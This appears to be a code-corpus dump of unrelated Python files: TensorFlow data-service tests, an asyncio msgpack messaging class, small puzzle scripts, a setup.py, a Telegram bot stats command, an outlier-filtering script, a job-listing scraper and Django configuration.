num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher_address(), ds
)
wrong_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs", cluster.dispatcher.target, dataset_id, wrong_spec
)
with self.assertRaises(Exception):
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdNotRegistered(self):
cluster = self.make_test_cluster(num_workers=1)
dataset_id = "UnregisteredID"
element_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
with self.assertRaisesRegex(
errors.NotFoundError, f"Dataset id {dataset_id} not found."
):
from_dataset_id_ds = data_service_ops.from_dataset_id(
data_service_ops.ShardingPolicy.OFF,
cluster.dispatcher.target,
dataset_id,
element_spec,
)
self.evaluate(self.getNext(from_dataset_id_ds)())
@combinations.generate(test_base.default_test_combinations())
def testCancellation(self):
self.skipTest("b/162521601")
sleep_microseconds = int(1e6) * 1000
cluster = self.make_test_cluster(num_workers=1)
# Create a dataset which produces the first element quickly, and the second
# element slowly. Fetching the first element triggers prefetching of the
# second element, which we should be able to cancel.
slow = dataset_ops.Dataset.range(1)
slow = slow.apply(testing.sleep(sleep_microseconds))
ds = dataset_ops.Dataset.range(1).concatenate(slow)
ds = self.make_distributed_dataset(ds, cluster)
ds = ds.prefetch(1)
get_next = self.getNext(ds)
self.assertEqual(0, self.evaluate(get_next()))
# Without properly implemented cancellation, we will hang here while trying
# to garbage collect the dataset iterator.
@combinations.generate(test_base.default_test_combinations())
def testRegisterDifferentDatasets(self):
ds_1 = dataset_ops.Dataset.range(10)
ds_2 = dataset_ops.Dataset.range(20)
cluster = self.make_test_cluster(num_workers=1)
id_1 = data_service_ops.register_dataset(cluster.dispatcher_address(), ds_1)
id_2 = data_service_ops.register_dataset(cluster.dispatcher_address(), ds_2)
self.assertNotEqual(self.evaluate(id_1), self.evaluate(id_2))
@combinations.generate(test_base.default_test_combinations())
def testRegisterWithExplicitDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset, dataset_id="dataset_id"
)
dataset = data_service_ops.from_dataset_id(
dataset_id=dataset_id,
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.assertDatasetProduces(dataset, list(range(10)))
# Verifies the dataset ID is indeed "dataset_id".
dataset = data_service_ops.from_dataset_id(
dataset_id="dataset_id",
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.assertDatasetProduces(dataset, list(range(10)))
# Eager mode only: In the graph mode, `register_dataset` may not run before
# `from_dataset_id` if `from_dataset_id` does not use its return value.
@combinations.generate(test_base.eager_only_combinations())
def testFromRegisteredStringDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
_ = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset, dataset_id="dataset_id"
)
dataset = data_service_ops.from_dataset_id(
dataset_id="dataset_id",
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testRegisterSameDatasetIds(self):
cluster = self.make_test_cluster(num_workers=1)
dataset1 = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.range(10)
dataset_id1 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset1, dataset_id="dataset_id"
)
dataset_id2 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset2, dataset_id="dataset_id"
)
dataset1 = data_service_ops.from_dataset_id(
dataset_id=dataset_id1,
element_spec=dataset1.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
dataset2 = data_service_ops.from_dataset_id(
dataset_id=dataset_id2,
element_spec=dataset2.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
# `dataset2` is empty because the datasets share the same job and `dataset1`
# has exhausted the dataset.
self.assertDatasetProduces(dataset1, list(range(10)))
self.assertDatasetProduces(dataset2, list())
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
different_dataset_id=[None, "another_dataset_id"]
),
)
)
def testRegisterDifferentDatasetIds(self, different_dataset_id):
cluster = self.make_test_cluster(num_workers=1)
dataset1 = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.range(10)
dataset_id1 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset1, dataset_id="dataset_id"
)
dataset_id2 = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset2, dataset_id=different_dataset_id
)
dataset1 = data_service_ops.from_dataset_id(
dataset_id=dataset_id1,
element_spec=dataset1.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
dataset2 = data_service_ops.from_dataset_id(
dataset_id=dataset_id2,
element_spec=dataset2.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
# `dataset1` and `dataset2` are different datasets.
self.assertDatasetProduces(dataset1, list(range(10)))
self.assertDatasetProduces(dataset2, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testDatasetsDoNotMatch(self):
cluster = self.make_test_cluster(num_workers=1)
dataset1 = dataset_ops.Dataset.range(10)
dataset2 = dataset_ops.Dataset.from_tensor_slices(list("Test dataset."))
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Datasets with the same ID should have the same structure",
):
dataset_id1 = data_service_ops.register_dataset(
cluster.dispatcher.target,
dataset1,
compression=None,
dataset_id="dataset_id",
)
dataset_id2 = data_service_ops.register_dataset(
cluster.dispatcher.target,
dataset2,
compression=None,
dataset_id="dataset_id",
)
dataset1 = data_service_ops.from_dataset_id(
dataset_id=dataset_id1,
element_spec=dataset1.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
dataset2 = data_service_ops.from_dataset_id(
dataset_id=dataset_id2,
element_spec=dataset2.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
)
self.getDatasetOutput(dataset1)
self.getDatasetOutput(dataset2)
@combinations.generate(test_base.default_test_combinations())
def testDoubleDistribute(self):
cluster = self.make_test_cluster(num_workers=1)
ds = self.make_distributed_range_dataset(num_elements=10, cluster=cluster)
ds = self.make_distributed_dataset(dataset=ds, cluster=cluster)
self.assertDatasetProduces(ds, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testTwoLevelDistribute(self):
cluster_1_size = 3
cluster_1 = self.make_test_cluster(num_workers=cluster_1_size)
cluster_2 = self.make_test_cluster(num_workers=1)
num_sizes = 10
size_repeats = 5
strings = ["a" * i for i in range(num_sizes)] * size_repeats
ds = dataset_ops.Dataset.from_tensor_slices(strings)
ds = ds.shuffle(len(strings))
ds = self.make_distributed_dataset(ds, cluster_1)
# Large enough so that all strings of the same size are windowed together.
window_size = cluster_1_size * size_repeats
batch_size = size_repeats
def key_func(x):
return math_ops.cast(string_ops.string_length_v2(x), dtypes.int64)
ds = ds.apply(
grouping.group_by_window(
key_func=key_func,
reduce_func=lambda _, x: x.batch(batch_size),
window_size=window_size,
)
)
ds = self.make_distributed_dataset(ds, cluster_2)
get_next = self.getNext(ds)
for _ in range(num_sizes):
element = self.evaluate(get_next())
for _ in range(1, cluster_1_size):
self.assertAllEqual(self.evaluate(get_next()), element)
self.assertEmpty(self.getIteratorOutput(get_next))
@combinations.generate(
combinations.times(test_base.default_test_combinations())
)
def testDistributeLargeGraph(self):
cluster = self.make_test_cluster(
num_workers=1, work_dir=NO_WORK_DIR, fault_tolerant_mode=False
)
# Larger than default OSS grpc message size limit of 4MB.
tensor = array_ops.ones((2, 1000, 1000), dtype=dtypes.float32)
ds = dataset_ops.Dataset.from_tensors(tensor)
ds = self.make_distributed_dataset(ds, cluster)
self.assertDatasetProduces(ds, [tensor])
@combinations.generate(
combinations.times(test_base.default_test_combinations())
)
def testBatchDropsAllElements(self):
cluster = self.make_test_cluster(
num_workers=2, fault_tolerant_mode=False
)
dataset = dataset_ops.Dataset.range(10).batch(1000, drop_remainder=True)
dataset = self.make_distributed_dataset(
dataset, cluster, processing_mode=data_service_ops.ShardingPolicy.OFF
)
self.assertDatasetProduces(dataset, [])
@combinations.generate(
combinations.times(test_base.default_test_combinations())
)
def testBatchDoesNotDropRemainder(self):
num_workers = 2
cluster = self.make_test_cluster(
num_workers=num_workers, fault_tolerant_mode=False
)
dataset = dataset_ops.Dataset.range(10).batch(1000, drop_remainder=False)
dataset = self.make_distributed_dataset(
dataset, cluster, processing_mode=data_service_ops.ShardingPolicy.OFF
)
self.assertDatasetProduces(dataset, [list(range(10))] * num_workers)
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(use_resource=False),
)
+ combinations.times(
test_base.default_test_combinations(),
combinations.combine(use_resource=True),
)
)
def testVariables(self, use_resource):
cluster = self.make_test_cluster(num_workers=1)
if not use_resource:
with variable_scope.variable_scope("foo", use_resource=False):
v = variable_v1.VariableV1(10, dtype=dtypes.int64)
else:
v = variables.Variable(10, dtype=dtypes.int64)
ds = dataset_ops.Dataset.range(3)
ds = ds.map(lambda x: x + v)
ds = self.make_distributed_dataset(ds, cluster)
self.evaluate(v.initializer)
self.assertDatasetProduces(
ds, list(range(10, 13)), requires_initialization=True
)
@combinations.generate(test_base.default_test_combinations())
def testNoShardingPolicy(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(20)
dataset = self.make_distributed_dataset(
dataset,
cluster=cluster,
processing_mode=data_service_ops.ShardingPolicy.OFF,
)
self.assertDatasetProduces(dataset, list(range(20)))
class DataServiceOpsGrpcDataTransferTest(
data_service_test_base.TestBase, parameterized.TestCase
):
@combinations.generate(test_base.default_test_combinations())
def testExplicitProtocolFromDatasetId(self):
cluster = self.make_test_cluster(
num_workers=1, data_transfer_protocol="grpc"
)
range_ds = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, range_ds
)
ds = data_service_ops.from_dataset_id(
dataset_id=dataset_id,
processing_mode="parallel_epochs",
element_spec=range_ds.element_spec,
service=cluster.dispatcher.target,
data_transfer_protocol="grpc",
)
self.assertDatasetProduces(ds, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testDistributeExplicitProtocol(self):
cluster = self.make_test_cluster(
num_workers=1, data_transfer_protocol="grpc"
)
ds = dataset_ops.Dataset.range(10)
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service="grpc://" + cluster.dispatcher_address(),
)
)
self.assertDatasetProduces(ds, list(range(10)))
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(compression=[None, "AUTO"]),
)
)
def testDistributeCompression(self, compression):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = self.make_distributed_range_dataset(
num_elements, cluster, compression=compression
)
self.assertDatasetProduces(ds, list(range(num_elements)))
if __name__ == "__main__":
test.main()
|
999,304 | dbd9da9d9cb494eb6f1ae92758b8c2a5eca928d6 | import random
import logging
import sys
import msgpack
import struct
from asyncio import get_event_loop, start_server, Task, coroutine, \
open_connection, IncompleteReadError, sleep
log = logging.getLogger('clicky.messageio')
class Connection:
def __init__(self, name, reader, writer):
self.live = True
self.name = name
self.reader = reader
self.writer = writer
class MessageIO:
def __init__(self, client_mode=False):
self.connections = []
self.client_mode = client_mode
def run(self, host='127.0.0.1', port=11000):
coro = start_server(self.client_connected, host=host, port=port)
loop = get_event_loop()
loop.run_until_complete(coro)
@coroutine
def connect(self, host, port):
log.info('connecting to {0}:{1}'.format(host, port))
reader, writer = yield from open_connection(host, port)
log.info('connected.')
yield from self.new_connection(reader, writer)
def client_connected(self, client_reader, client_writer):
Task(self.new_connection(client_reader, client_writer))
@coroutine
def new_connection(self, reader, writer):
name = writer.get_extra_info('peername', None)
log.info('new connection {}'.format(name))
# FIXME
assert name is not None
c = Connection(name, reader, writer)
self.connections.append(c)
Task(self.listen(c))
@coroutine
def listen(self, connection):
while connection.live:
log.info('listening to {} for msg'.format(connection.name))
try:
msg = yield from self.receive(connection.reader)
Task(self.handle_message(connection, msg))
except IncompleteReadError as e:
log.info('Incomplete Read. {} set to dead'.format(
connection.name))
connection.live = False
                log.info('removing {} from connections'.format(connection.name))
# FIXME: O(n)! make connections a set
self.connections.remove(connection)
@coroutine
def send(self, obj, connection=None, *, packed=False):
if self.client_mode:
yield from self.maybe_wait_for_connect()
if not connection and self.client_mode:
connection = self.connections[0]
elif not connection and not self.client_mode:
raise Exception('must specify connection in server mode!')
if packed:
m = obj
else:
m = msgpack.packb(obj, use_bin_type=True)
L = len(m)
log.debug('sending message length({0}) to {1}'.format(L, connection.name))
try:
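            # length-prefixed framing: a 4-byte big-endian size header, then the msgpack payload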
connection.writer.write(struct.pack('>I',L))
connection.writer.write(m)
yield from connection.writer.drain()
except ConnectionResetError as e:
log.info('Connection Reset. {} set to dead'.format(
connection.name))
connection.live = False
@coroutine
def maybe_wait_for_connect(self):
while self.client_mode and len(self.connections) == 0:
log.debug('waiting...')
yield from sleep(0.25)
@coroutine
def receive(self, reader):
# read 4 bytes and interpret them as a big endian integer for
# length of the message to follow
data = yield from reader.readexactly(4)
log.debug('received {}'.format(data))
length = struct.unpack('>I', data)[0]
log.debug('incoming message of length {}'.format(length))
# now read a message of this length and unpack it using msgpack
data = yield from reader.readexactly(length)
msg = msgpack.unpackb(data, encoding='utf-8')
log.debug('got message of length {}'.format(length))
return msg
@coroutine
def handle_message(self, connection, msg):
log.info('received message from {}'.format(connection.name))
|
999,305 | d09fb1ff8b4a75bef31550b8b5fafffdc039e13e | # Seven Dwarfs
nlist=[]
for nan in range(9):
nlist.append(int(input()))
def find(nlist):
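    # the seven genuine dwarfs' heights sum to 100, so the two impostors account for total-100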
total=sum(nlist)
for i in range(9):
for j in range(i+1,9):
if nlist[i]+nlist[j]==total-100:
return nlist[i],nlist[j]
n1,n2=find(nlist)
nlist.remove(n1)
nlist.remove(n2)
nlist.sort()
for i in nlist:
print(i)
|
999,306 | 4774d42f697b676158dfd6c22d8348d8b758a145 | """
Install portal via setuptools
"""
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as testcommand
with open('test_requirements.txt') as test_reqs:
TESTS_REQUIRE = test_reqs.readlines()
with open('README.rst') as readme_file:
README = readme_file.read()
class PyTest(testcommand):
"""PyTest class to enable running `python setup.py test`"""
user_options = testcommand.user_options[:]
user_options += [
('coverage', 'C', 'Produce a coverage report for portal'),
('pep8', 'P', 'Produce a pep8 report for portal'),
('pylint', 'l', 'Produce a pylint report for portal'),
]
coverage = None
pep8 = None
    pylint = None
test_suite = False
test_args = []
def initialize_options(self):
pass
def finalize_options(self):
self.test_suite = True
self.test_args = []
if self.coverage:
self.test_args.extend(['--cov', 'portal'])
if self.pep8:
self.test_args.append('--pep8')
        if self.pylint:
self.test_args.append('--lint')
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import pytest
# Needed in order for pytest_cache to load properly
# Alternate fix: import pytest_cache and pass to pytest.main
import _pytest.config
plugin_manager = _pytest.config.get_plugin_manager()
plugin_manager.consider_setuptools_entrypoints()
sys.exit(pytest.main(self.test_args))
setup(
name='portal',
version='0.3.0',
license='AGPLv3',
author='MIT ODL Engineering',
author_email='odl-engineering@mit.edu',
url='http://github.com/mitodl/portal',
description="Teacher's Portal",
long_description=README,
packages=find_packages(),
install_requires=[
'Django',
'PyYAML',
'dj-database-url',
'dj-static',
'uwsgi',
'psycopg2',
'tox',
],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Programming Language :: Python',
],
test_suite="portal.tests",
tests_require=TESTS_REQUIRE,
cmdclass={"test": PyTest},
include_package_data=True,
zip_safe=False,
)
|
999,307 | 31ccb0c67c0f39c82970c902d8c53c7110e5803d | import platform
import re
import socket
import sys
import time
import uuid
from datetime import datetime
from os import environ, execle, path, remove
from player.helpers.decorators import humanbytes
import psutil
from pyrogram import Client, filters, __version__
# FETCH SYSINFO
@Client.on_message(filters.command('stats'))
async def give_sysinfo(client, message):
splatform = platform.system()
platform_release = platform.release()
platform_version = platform.version()
architecture = platform.machine()
hostname = socket.gethostname()
ip_address = socket.gethostbyname(socket.gethostname())
mac_address = ":".join(re.findall("..", "%012x" % uuid.getnode()))
processor = platform.processor()
ram = humanbytes(round(psutil.virtual_memory().total))
cpu_freq = psutil.cpu_freq().current
if cpu_freq >= 1000:
cpu_freq = f"{round(cpu_freq / 1000, 2)}GHz"
else:
cpu_freq = f"{round(cpu_freq, 2)}MHz"
du = psutil.disk_usage(client.workdir)
psutil.disk_io_counters()
disk = f"{humanbytes(du.used)} / {humanbytes(du.total)} " f"({du.percent}%)"
cpu_len = len(psutil.Process().cpu_affinity())
somsg = f"""**System Info**
**PlatForm :** `{splatform}`
**PlatForm - Release :** `{platform_release}`
**PlatForm - Version :** `{platform_version}`
**Architecture :** `{architecture}`
**Hostname :** `{hostname}`
**IP :** `{ip_address}`
**Mac :** `{mac_address}`
**Processor :** `{processor}`
**Ram :** `{ram}`
**CPU :** `{cpu_len}`
**CPU FREQ :** `{cpu_freq}`
**DISK :** `{disk}`
"""
await message.reply(somsg)
|
999,308 | 47fec2e496b52eee562b49414b1c14169ec49ec9 | import numpy as np
from scipy.stats import rankdata
import argparse
import loc_utils as lut
from standards import *
# Column index
r = RAWix()
def report_analysis(analysis, outliers):
n = len(outliers)
if n > 0:
print('{} detected {} outlier(s):'.format(analysis, n))
print(outliers)
else:
print('No outliers detected by {}'.format(analysis))
def measure_choice_bias(data, collapse_tasks=True):
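    # pmax[i, j]: proportion of trials on which subject i made their single most frequent choice in task j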
sids = lut.get_unique(data, r.ix('sid'))
tasks = lut.get_unique(data, r.ix('cat'))
num_tasks = tasks.size
num_sids = sids.size
pmax = np.zeros([num_sids, num_tasks])
for i, sid in enumerate(sids):
for j, tsk in enumerate(tasks):
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('cat'): tsk})
choices, counts = np.unique(data[mask, r.ix('food')], return_counts=True)
pmax[i, j] = np.max(counts) / np.sum(counts)
return np.mean(pmax, axis=1) if collapse_tasks else pmax
def measure_allocation_variance(data):
sids = lut.get_unique(data, r.ix('sid'))
num_sids = sids.size
free_stage = 1
stds = np.zeros(num_sids)
for i, sid in enumerate(sids):
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('stage'): free_stage})
choices, counts = np.unique(data[mask, r.ix('cat')], return_counts=True)
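        # pad the per-task counts out to all 4 tasks so never-chosen tasks enter the SD as zeros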
stds[i] = np.std(
np.pad(counts, pad_width=(0, 4-np.size(counts)), mode='constant')
)
return stds
def detect_extreme_sticking(data):
outliers = []
sids = lut.get_unique(data, r.ix('sid'))
for sid in sids:
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('stage'): 1})
tasks_played = data[mask, r.ix('cat')]
if np.all(tasks_played == tasks_played[0]):
outliers.append(sid)
report_analysis('Extreme sticking analysis', outliers)
return outliers
def detect_choice_bias(data, criterion='sd', critval=2, return_cutoff=False):
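    # criterion 'val' flags mean biases above critval directly; anything else flags biases more than critval standard deviations above the group mean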
mean_choice_bias = measure_choice_bias(data)
if criterion.lower() == 'val':
outliers = np.where(mean_choice_bias > critval)[0].tolist()
else:
average_mean_choice_bias = np.mean(mean_choice_bias)
sd_mean_choice_bias = np.std(mean_choice_bias)
critval = average_mean_choice_bias + sd_mean_choice_bias * critval
outliers = np.where(np.abs(mean_choice_bias) > critval)[0].tolist()
report_analysis('Choice bias analysis', outliers)
if return_cutoff:
return outliers, critval
return outliers
def detect_by_allocation_variance(data, crit):
outliers = []
sids = lut.get_unique(data, r.ix('sid'))
num_sids = sids.size
free_stage = 1
stds = np.zeros(num_sids)
for i, sid in enumerate(sids):
mask = lut.get_mask(data, {r.ix('sid'): sid, r.ix('stage'): free_stage})
choices, counts = np.unique(data[mask, r.ix('cat')], return_counts=True)
stds[i] = np.std(
np.pad(counts, pad_width=(0, 4-counts.size), mode='constant')
)
if stds[i] > crit:
outliers.append(sid)
report_analysis('Allocation variance', outliers)
return outliers
def remove_by_sid(data, sids, assign_new_ids=False):
outliers_mask = np.isin(data[:, r.ix('sid')], sids)
filtered_data = data[np.logical_not(outliers_mask), :]
if assign_new_ids:
filtered_data[:, r.ix('sid')] = rankdata(filtered_data[:, r.ix('sid')], 'dense') - 1
return filtered_data
def filter_outliers(path_to_data, save_to=None, extreme_sticking=True,
choice_bias_criterion='sd', choice_bias_critval=2,
alloc_var_crit=None,
assign_new_ids=True,
report_counts=True):
data = lut.unpickle(path_to_data)
lut.report_subject_counts(data['main'])
stickers1, stickers2, choice_biased = [], [], []
if extreme_sticking:
stickers1 = detect_extreme_sticking(data['main'])
if choice_bias_criterion:
choice_biased = detect_choice_bias(data['main'], criterion=choice_bias_criterion, critval=choice_bias_critval)
if alloc_var_crit:
stickers2 = detect_by_allocation_variance(data['main'], alloc_var_crit)
all_outliers = np.unique(stickers1 + stickers2 + choice_biased)
print('Removing {} outliers'.format(all_outliers.size))
data['main'] = remove_by_sid(data['main'], all_outliers, assign_new_ids=assign_new_ids)
data['extra'] = remove_by_sid(data['extra'], all_outliers, assign_new_ids=assign_new_ids)
lut.report_subject_counts(data['main'])
if save_to:
lut.dopickle(save_to, data)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('path')
parser.add_argument('-s', '--save_to', help='pickles and saves data with outliers removed', default=None)
parser.add_argument('-x', '--extreme_sticking', help='whether to remove extreme stickers', default=True)
    parser.add_argument('-c', '--side_bias_crit', help='criterion for the choice bias cutoff ("sd" or "val")', default='sd')
    parser.add_argument('-v', '--side_bias_critval', help='cutoff value used with the choice bias criterion', default=2,
                        type=int)
ARGS = parser.parse_args()
filter_outliers(path_to_data=ARGS.path,
save_to=ARGS.save_to,
extreme_sticking=ARGS.extreme_sticking,
choice_bias_criterion=ARGS.side_bias_crit,
choice_bias_critval=ARGS.side_bias_critval)
# # detect_extreme_sticking by groups
# for grp in [0,1]:
# for cnd in [0,1]:
# mask = lut.get_mask(main_data, {r.ix('group'):grp, r.ix('cond'): cnd})
# detect_extreme_sticking(main_data[mask, :]) |
999,309 | 306e9ba396d8a547aaa2deb9ac291960113c9e3f | __author__ = 'Jun Wang'
# -*- coding:utf-8 -*-
import json, urllib2, sys, MySQLdb
# import pandas as pd
reload(sys)
sys.setdefaultencoding('utf8')
# from pandas import DataFrame,Series
db = MySQLdb.connect(host="localhost",user="root", passwd="wanjun", db="test", use_unicode=True, charset="utf8")
cursor = db.cursor()
cursor.execute("DROP TABLE IF EXISTS lagou_it")
db.commit()
cursor.execute('''CREATE TABLE IF NOT EXISTS lagou_it(
position_name VARCHAR(100),
company_name VARCHAR(100),
company_size VARCHAR(100),
city VARCHAR(20),
industry VARCHAR(200),
salary VARCHAR(50),
jobnature VARCHAR(20),
education VARCHAR(50),
workyear VARCHAR(50)
)''')
def lagou_spider_keyword():
i = 0
# type = 'true'
url = 'http://www.lagou.com/jobs/positionAjax.json?pn='+str(i+1)
data = urllib2.urlopen(url).read()
data_json = json.loads(data)
# totalCount = int(data_json['content']['positionResult']['totalCount'])
totalCount = 5000
resultSize = int(data_json['content']['positionResult']['resultSize'])
totalPage = totalCount/resultSize+1
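    # Python 2 integer division: pages needed, rounded up (overshoots by one when totalCount divides evenly)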
result = []
for i in range(totalPage):
# time.sleep(1)
print 'fetching Page '+str(i)
url = 'http://www.lagou.com/jobs/positionAjax.json?pn='+str(i+1)
data = urllib2.urlopen(url).read()
data_json = json.loads(data)
resultSize = int(data_json['content']['positionResult']['resultSize'])
if resultSize>0:
for j in range(resultSize):
search_result = data_json['content']['positionResult']['result']
result_dic = dict(search_result[j])
companyFullName = result_dic['companyFullName']
positionName = result_dic['positionName']
education = result_dic['education']
city = result_dic['city']
industryField = result_dic['industryField']
jobNature = result_dic['jobNature']
workYear = result_dic['workYear']
salary = result_dic['salary']
companySize = result_dic['companySize']
result_pos = [positionName,companyFullName,companySize,city,industryField,salary,jobNature,education,workYear]
result.append(result_pos)
sql = """INSERT INTO lagou_it\
SET position_name=%s,company_name=%s,company_size=%s,city=%s,industry=%s,salary=%s,jobnature=%s,education=%s,workyear=%s"""
for x in range(0, len(result)):
cursor.execute(sql,(result[x][0],result[x][1],result[x][2],result[x][3],result[x][4],result[x][5],result[x][6],result[x][7],result[x][8],))
db.commit()
if __name__=='__main__':
# keyword='数据分析' #define search keyword
lagou_spider_keyword()
|
999,310 | 86e8691bf6f81e7cbccbf8acbf7e830c3ce11793 | num = int(input('Enter a number: '))
cpy_num = abs(num)  # use the absolute value so the loop also terminates for negative input
counter = 0
while cpy_num != 0:
    counter += 1
    cpy_num = cpy_num//10
if counter == 0:  # the number 0 still has one digit
    counter = 1
print('The number', num, 'contains', counter, 'digits') if counter > 1 \
else print('The number', num, 'contains', counter, 'digit')
|
999,311 | 64bb870c2941b518a17d1156ab52b4c543bf6b91 | ''' Read input from STDIN. Print your output to STDOUT '''
#Use input() to read input from STDIN and use print to write your output to STDOUT
'''
Count In Range And Specific (100 Marks)
You will be given an array and a range and you need to count how many array
elements lies in that range and not divisible by 3 and 5.
Input Format
First line will contain an integer indicating the size of the array.
Next line will contain n integers denoting the array elements.
The third line will contain two integers denoting the range.
Constraints
1 <= L <= 1000
1 <= Ai <= 1000
Output Format
Print the count to the STDOUT.
Sample TestCase 1
Input
6
16 17 4 3 5 2
2 10
output
2
'''
import sys
def main():
# Write code here
n = int(input().strip())
alist = [int(x) for x in input().strip().split()]
start,stop = [int(x) for x in input().strip().split()]
alist =list(filter(lambda x: x>=start and x<=stop,alist))
sys.stdout.write(str(len(list(filter(lambda x: x%3!=0 and x%5!=0,alist)))))
main()
|
999,312 | b2d085f928bdd385fce67551e491ece66ac618c4 |
def reverse(array, k):
section = array[0:k][::-1]
return section + array[k:]
a = [5, 6, 7, 2, 4, 3, 8, 10]
k = 3
print(reverse(a, k))
|
999,313 | 982222fc025e5b265bdcc832a048e70d508ed0e0 | echo "hello"
|
999,314 | 44f45d86eb9dba8f6579cfa504aa5faa29991fd3 | """courses URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path, re_path
from courses import views
app_name = 'courses'
# urlpatterns contains the list of URL routes
urlpatterns = [
#GET /
path('', views.index, name='index'),
#re_path(r'(?P<pk>\d+)/$', views.details, name='details'),
re_path(r'(?P<slug>[\w_-]+)/$', views.details, name='details'),
re_path(r'(?P<slug>[\w_-]+)/inscricao$', views.enrollment, name='enrollment'),
re_path(r'(?P<slug>[\w_-]+)/cancelar-inscricao$', views.undo_enrollment,
name='undo_enrollment'),
re_path(r'(?P<slug>[\w_-]+)/anuncios$', views.announcements,
name='announcements'),
re_path(r'(?P<slug>[\w_-]+)/anuncios/(?P<pk>\d+)$', views.show_announcement,
name='show_announcement'),
] |
999,315 | 37964b63f90ba2617445e667b988796ae46fc5be | from rest_framework.serializers import ModelSerializer
from .models import User
class UserProfileSerializer(ModelSerializer):
class Meta:
model = User
        fields = [
            'username',
            'address',
            'mobile_number',
            'first_name',
            'last_name'
        ]
|
999,316 | 64eda1b08f263efe5cf81982b729f9a302e3cab5 |
"""
Base Django settings for puzzlehunt_server project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from os.path import dirname, abspath
import codecs
codecs.register(lambda name: codecs.lookup('utf8') if name == 'utf8mb4' else None)
BASE_DIR = dirname(dirname(dirname(abspath(__file__))))
# Application definition
SITE_TITLE = "Puzzlehunt CMU"
INSTALLED_APPS = (
'bootstrap_admin',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'django.contrib.sites',
'django.contrib.flatpages',
'huntserver',
'crispy_forms',
'huey.contrib.djhuey',
)
SITE_ID = 1 # For flatpages
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'puzzlehunt_server.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': [os.path.join(BASE_DIR, 'puzzlehunt_server/templates')],
'OPTIONS': {
'builtins': ['huntserver.templatetags.hunt_tags',
'huntserver.templatetags.prepuzzle_tags'],
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.static',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://redis:6379/1",
